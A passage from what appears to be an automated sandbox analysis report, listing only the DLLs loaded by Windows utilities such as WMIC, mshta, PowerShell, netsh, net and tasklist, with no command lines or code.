                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\query.exeSection loaded: regapi.dll
                  Source: C:\Windows\System32\quser.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\quser.exeSection loaded: utildll.dll
                  Source: C:\Windows\System32\quser.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\quser.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\ARP.EXESection loaded: snmpapi.dll
                  Source: C:\Windows\System32\ARP.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ARP.EXESection loaded: inetmib1.dll
                  Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ARP.EXESection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ARP.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\NETSTAT.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\NETSTAT.EXESection loaded: snmpapi.dll
                  Source: C:\Windows\System32\NETSTAT.EXESection loaded: inetmib1.dll
                  Source: C:\Windows\System32\NETSTAT.EXESection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
